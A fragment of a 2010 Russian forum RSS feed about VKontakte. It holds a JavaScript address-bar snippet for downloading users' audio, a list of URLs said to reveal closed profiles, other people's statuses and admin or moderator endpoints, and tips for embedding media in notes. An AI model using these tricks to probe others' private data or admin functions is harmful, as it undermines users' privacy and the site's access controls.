			<guid>https://kasper.7li.ru/viewtopic.php?pid=7#p7</guid>
		</item>
		<item>
			<title>Как скачать музыку с контакта (скрипт)</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=5#p5</link>
			<description>&lt;p&gt;Достаточно удобный и простой способ. Чтобы скачать аудиозапись,зайдите на любую страничку, где они находятся (В своих аудиозаписях, аудиозаписяхгруппы или у друзей)Скопируйте этот скрипт в буфер обмена:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt; javascript:function operate(konfuze,loves,you,all_,xP){you=you.toString(10);while(you.length&amp;lt;5){you=&#039;0&#039;+you;}document.getElementById(&#039;audio&#039;+konfuze).innerHTML=&#039;&amp;lt;div&amp;gt;&amp;lt;a href=&amp;quot;http://cs&#039;+loves+&#039;.vkontakte.&#039;+&#039;ru/u&#039;+you+&#039;/audio/&#039;+all_+&#039;.mp3&amp;quot;&amp;gt;CКАЧАТЬ &#039;+document.getElementById(&#039;performer&#039;+konfuze).innerHTML+&#039;- &#039;+document.getElementById(&#039;title&#039;+konfuze).innerHTML+&#039;&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;br /&amp;gt;&#039;;}&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Вставте скрипт в строку адреса, на страницу с аудиозаписями.Потом,нажмите клавишу Enter на&amp;#160; вашей клавиатуре.На первый взгляд ничего не произойдёт. Но на самом деле, теперь, после того как вы будите нажимать на кнопочку Play будет появляться ссылка с нужной звукозаписью в формате mp3.&lt;br /&gt;Кликайте правой кнопкой мыши, и выбирайте «Сохранить объект как...»&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Mon, 04 Jan 2010 05:52:29 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=5#p5</guid>
		</item>
		<item>
			<title>Немного о Вконтакте</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=3#p3</link>
			<description>&lt;p&gt;Вместо USERID/GROUPID номер того, у кого надо посмотреть.&lt;/p&gt;
						&lt;p&gt;Чужой рейтинг: &lt;a href=&quot;http://vkontakte.ru/rate.php?act=vote&amp;amp;id=USERID&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/rate.php?act=vote&amp;amp;id=USERID&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Чужие приложения: &lt;a href=&quot;http://vkontakte.ru/apps.php?mid=USERID&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/apps.php?mid=USERID&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Чужие вопросы: &lt;a href=&quot;http://vkontakte.ru/questions.php?mid=USERID&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/questions.php?mid=USERID&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Чужие статусы (применять на своей странице):&lt;br /&gt;javasсript: getActivityHistory(USERID)&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/profile.php?id=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/profile.php?id=&lt;/a&gt; USERID&amp;amp;activityhistory=1&lt;br /&gt;ОЧЕНЬ РЕДКО прокатывает с закрытыми юзерами&lt;/p&gt;
						&lt;p&gt;Статистика любой группы: &lt;a href=&quot;http://vkontakte.ru/stats.php?gid=GROUPID&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/stats.php?gid=GROUPID&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Отображение закрытой страницы при переходе: &lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/search.php?id=USERID&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/search.php?id=USERID&lt;/a&gt;&lt;br /&gt;Например, если закрыть страницу, можно набрать эту ссылку и свой ID.&lt;/p&gt;
						&lt;p&gt;Список ошибок, набор вручную:&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/blank.php?code=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/blank.php?code=&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Все языки:&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/settings.php?act=languages&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/settings.php?act=languages&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Страница администратора (не пускает )&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/album5009611_94648067&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/album5009611_94648067&lt;/a&gt; (Спасибо id42329892)&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/admin.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/admin.php&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/admin.php?act=error_item&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/admin.php?act=error_item&lt;/a&gt;&lt;br /&gt;Репорты:&lt;br /&gt;http://vkontakte .ru/admin.php?act=reports_details&amp;amp;item_id=[id]&amp;amp;item_type=[type]&lt;/p&gt;
						&lt;p&gt;Добавление страницы пунктов:&lt;br /&gt;http://vkontakte .ru/admin.php?act=a_added_items_page&amp;amp;index=page&amp;amp;filter =[filter_current]&amp;amp;c=[]&lt;/p&gt;
						&lt;p&gt;Дать пользователю права модератора:&lt;br /&gt;http://vkontakte .ru/admin.php?act=a_add_informer_moder&amp;amp;page=[]&lt;/p&gt;
						&lt;p&gt;Снять с пользователя права модератора:&lt;br /&gt;http://vkontakte .ru/admin.php?act=a_remove_informer_moder&amp;amp;moder_id=[id]&lt;/p&gt;
						&lt;p&gt;Повторить чтото с правами модератора:&lt;br /&gt;http://vkontakte .ru/admin.php?act=a_return_informer_moder&amp;amp;moder_id=[id]&lt;/p&gt;
						&lt;p&gt;Рапорт о исправлении ненастоящей информации(!):&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/admin.php?act=fixed&amp;amp;wid=USERID&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/admin.php?act=fixed&amp;amp;wid=USERID&lt;/a&gt;&lt;br /&gt;Принцип: Номер в очереди, получивших табличку.&lt;br /&gt;Пример: У вас номер 1000. Следующий получит номер 1001. И т.д.&lt;/p&gt;
						&lt;p&gt;Удалить все сообщения разом:&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/mail.php?act=msgOutboxDel&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/mail.php?act=msgOutboxDel&lt;/a&gt; - исходящие&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/mail.php?act=msgInboxDel&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/mail.php?act=msgInboxDel&lt;/a&gt; - входящие&lt;/p&gt;
						&lt;p&gt;Добавить в закладки закрытого юзера:&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/fave.php?act=addPerson&amp;amp;mid=U...&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/fave.php?act=addPerson&amp;amp;mid=U...&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Ещё немного пасхалок:&lt;br /&gt;Группа FLASH API, отдел новостей, страница свободна для редактирования всем без исключений -&lt;br /&gt;Павел Дуров&lt;br /&gt;Группа FLASH API, под-раздел новостей -&lt;br /&gt;Recent News&lt;br /&gt;Старый поиск&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/search.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/search.php&lt;/a&gt;&lt;br /&gt;Очень странная страница &lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/inv.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/inv.php&lt;/a&gt;&lt;br /&gt;Супер-старая страница FAQ&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/faq.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/faq.php&lt;/a&gt;&lt;br /&gt;Старая страница FAQ&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/help.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/help.php&lt;/a&gt;&lt;br /&gt;Старые новости&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/news.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/news.php&lt;/a&gt;&lt;br /&gt;Простой поиск&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/search.php?act=mixed&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/search.php?act=mixed&lt;/a&gt;&lt;br /&gt;Старый поиск по видео&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/videosearch.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/videosearch.php&lt;/a&gt;&lt;br /&gt;События&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/ebrowse.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/ebrowse.php&lt;/a&gt;&lt;br /&gt;Скрытая ссылка из меню выше&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/gsearch.php?from=people&amp;amp;sort=-1&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/gsearch.php?from=people&amp;amp;sort=-1&lt;/a&gt;&lt;br /&gt;Старое введение&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/help.php?page=demo&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/help.php?page=demo&lt;/a&gt;&lt;br /&gt;Профессиональные контакты (?)&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/pro.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/pro.php&lt;/a&gt;&lt;br /&gt;Старое оформление&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/images/header.gif&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/images/header.gif&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/images/header_divider.gif&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/images/header_divider.gif&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/images/xhead.gif&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/images/xhead.gif&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Старая страница регистрации&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/reg.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/reg.php&lt;/a&gt;&lt;br /&gt;Java-скрипты и CSS-стили, выдрано&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/langRus.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/langRus.js&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/langEng.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/langEng.js&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/common.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/common.js&lt;/a&gt;&lt;br /&gt;* &lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/basic.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/basic.js&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/typeahead.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/typeahead.js&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/suggest.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/suggest.js&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/account.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/account.js&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/effects.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/effects.js&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/niftycube.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/niftycube.js&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/select.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/select.js&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/box.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/box.js&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/functions.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/functions.js&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js//js/audio.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js//js/audio.js&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/swfobject.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/swfobject.js&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/profile.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/profile.js&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/simpleajax.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/simpleajax.js&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/js/lib/utils.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/js/lib/utils.js&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;* &lt;a href=&quot;http://vkontakte.ru/css/nopadding.css&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/css/nopadding.css&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/css/admin2.css&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/css/admin2.css&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/css/account.css&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/css/account.css&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/css/box.css&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/css/box.css&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/css/rustyle.css&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/css/rustyle.css&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/css/ie.css&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/css/ie.css&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/css/ie7.css&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/css/ie7.css&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/css/rustylex.css&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/css/rustylex.css&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/css/mail2.css&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/css/mail2.css&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/css/search.css&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/css/search.css&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/css/dialog2.css&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/css/dialog2.css&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/css/account.css&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/css/account.css&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/css/help.css&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/css/help.css&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/css/profile.css&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/css/profile.css&lt;/a&gt;&lt;br /&gt;* &lt;a href=&quot;http://vkontakte.ru/css/player.css&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/css/player.css&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Архивы&lt;br /&gt;&lt;a href=&quot;http://web.archive.org/web/200701142...e.ru/top10.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://web.archive.org/web/200701142...e.ru/top10.php&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://web.archive.org/web/200701150...te.ru/help.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://web.archive.org/web/200701150...te.ru/help.php&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://web.archive.org/web/200701150...ontakte.ru/reg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://web.archive.org/web/200701150...ontakte.ru/reg&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://web.archive.org/web/200710152...php?page=about&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://web.archive.org/web/200710152...php?page=about&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://web.archive.org/web/200701150...php?page=about&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://web.archive.org/web/200701150...php?page=about&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Остальное&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/infested_ip_list.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/infested_ip_list.html&lt;/a&gt;&lt;br /&gt;Техническая поддержка&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/confirm.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/confirm.php&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/confirm.php?code=32579499a5bdc63...&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/confirm.php?code=32579499a5bdc63...&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/feed.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/feed.php&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/feed2.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/feed2.php&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/upload.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/upload.php&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/select.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/select.php&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/config.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/config.php&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/translate.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/translate.php&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/help.php?page=warning&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/help.php?page=warning&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/help.php?page=contest&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/help.php?page=contest&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/help.php?page=privacy&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/help.php?page=privacy&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/125upload.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/125upload.php&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Добавлено через 5 часов 8 минут&lt;br /&gt;И ещё:&lt;/p&gt;
						&lt;p&gt;1. Для того чтобы вставить песню в заметку нам нужны два параметра: номер песни, данный при загрузке и id загрузившего чел-ка. Посмотреть их можно в исходном коде страницы (Ctrl+u или щелчок правой кнопкой мыши на странице с аудио, из появившегося списка «Исходный код страницы»). В коде нужно найти строчки содержащие название песни. Советую воспользоваться поиском – Ctrl +f. Внимание! Поиск должен быть или только по названию или только по автору. И так, предположим перед нами код вида (см. чуть выше найденного названия): &amp;lt;table style=&amp;quot;width:575px&amp;quot; style=&#039;margin-left:10px;&#039;&amp;gt;&amp;lt;tbody&amp;gt; &amp;lt;tr&amp;gt;&amp;lt;td style=&amp;quot;width: 18px; vertical-align:top&amp;quot;&amp;gt; &amp;lt;img class=&amp;quot;playimg&amp;quot; onclick=&amp;quot;return operate(41470565,1553,8358362,&#039;86282137c7&#039;,230);&amp;quot; id=&amp;quot;imgbutton41470565&amp;quot; nosorthandle=&amp;quot;true&amp;quot; src=&amp;quot;images/play.gif&amp;quot;/&amp;gt;. То, что идет в скобках после return operate, мы можем использовать. Затем в заметках пишем [[audio, потом без пробела ваш айди ( или id другого человека, далее, ставим после этой ерунды нижнее подчеркивание и дописываем число, которое идет первое в скобках, закрываем двойные квадратные скобки. Следите, чтобы не было нигде пробелов, а то работать не будет. Выглядит это примерно так [[аudio8358362_41470565]]. На самом деле, все не так запарно, как кажется&lt;/p&gt;
						&lt;p&gt;2. Вот ещё проще способ:&lt;br /&gt;жмём на странице где нужный трек ctrl+u&lt;br /&gt;потом ctrl+f&lt;br /&gt;в поиске вводим название трека&lt;br /&gt;дальше ищите такую строку:{act:&#039;a_add&#039;,add:1,gid:0,aid:58141834,oid:9 121137,hash:.......&lt;br /&gt;и вырезать оттуда числа идущие после oid и aid&lt;br /&gt;[[audio&amp;quot;число после oid&amp;quot;_&amp;quot;число идущее после aid&amp;quot;]]&lt;/p&gt;
						&lt;p&gt;в итоге в заметку вставляем данную запись:&lt;br /&gt;[[audio9121137_58141834]]&lt;/p&gt;
						&lt;p&gt;из двух новых способов первым нужно пользоваться, когда находишься на страничке каго-либо человека а вторым способом нужно пользоваться, когда находишься в поисковике музыки..))&lt;/p&gt;
						&lt;p&gt;3. Фото, Видео, Люди и Группы в заметках&lt;br /&gt;Тут проще. Копируем, то, что находится в адресной строке и вставляем в заметку или копируем только, то, что идет после последнего слеша и заключаем в двойные квадратные скобки. Все. Будет отображаться как надо.&lt;br /&gt;Например: &lt;br /&gt;[[photoxxxx_xxxxx]] xxxx - ну ясно что&lt;br /&gt;[[videoxx_xxxxxx]] xxxx - ну понятно что это=)&lt;br /&gt;[[idxxxxx]] xxxxx - id человека =)&lt;br /&gt;[[clubxxxxx]] xxxx - номер группы&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Mon, 04 Jan 2010 05:47:49 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=3#p3</guid>
		</item>
		<item>
			<title>Важно: О В Контакте</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=2#p2</link>
			<description>&lt;p&gt;О проекте: В конце 2007 года лидером народного голосования «Премии Рунета -2007», стала известная социальная интернет-сеть В Контакте.Ру. Этот проект помогая пользователям рунета поддерживать связь друг с другом, стал первым по посещаемости из русских порталов, обогнав такие проекты как поисковые сервисы «Яндекс», «Rambler», социальную сеть «Odnoklassniki.ru», «Mail.ru». В отличии от портала «Odnoklassniki.ru», в котором основными участниками являются люди среднего и старшего возрастов, vkontakte .ru общаются в основном, школьники и студенты. Портал удобен для создания различных групп, оформлении личного пространства, добавления фото и видеофайлов. &lt;br /&gt;Доподлинно не известно, кто является настоящим владельцем портала. Юридически хозяин – ООО «В Контакте». В СМИ проскальзывала информация о том, что 60% проекта владеет Вячеслав Мирилашвили. Создателями и совладельцами сайта также по слухам являются братья Николай и Павел Дуровы. Если опираться на слухи, то такая скрытность объясняется тем, что сайт ВКонтакте.Ру – проект Федеральной Службы Безопасности. Стоит отметить, что такие же слухи распространяются и о сети Odnoklassniki.ru. &lt;br /&gt;Интересен факт, что первый случай эпидемии компьютерного вируса, распространяющийся через социальные сети, связан как раз с порталом vkontakte. Несколько сотен тысяч пользователей сайта одновременно получили послание от несуществующего персонажа, которое было заражено компьютерным вирусом. Сегодня специалисты портала рекомендуют участникам проекта проверять компьютер на наличие вирусов после просмотра изображений на портале. &lt;/p&gt;
						&lt;p&gt;Примечательно, что за всю историю существования проекта, социальная сеть ВКонтакте.ру ни разу не согласилась на предложение о инвестициях со стороны. Официальная причина отказов – проект создан исключительно ради людей, желающих общаться, и у владельцев сайта никогда не было цели перепродать проект. Но, факт в том, что при таком большом количестве посещений доходы социальной сети минимальны. Но такая ситуация наблюдается не только у портала ВКонтакте.Ру - ни одна из аналогичных социальных сетей не научилась зарабатывать на своем трафике. Тем не менее, свою основную задачу ВКонтакте выполняет с успехом – миллионы посетителей находят здесь прекрасную возможность общаться со старыми товарищами и приобретать новых друзей.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Mon, 04 Jan 2010 05:46:02 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=2#p2</guid>
		</item>
	</channel>
</rss>
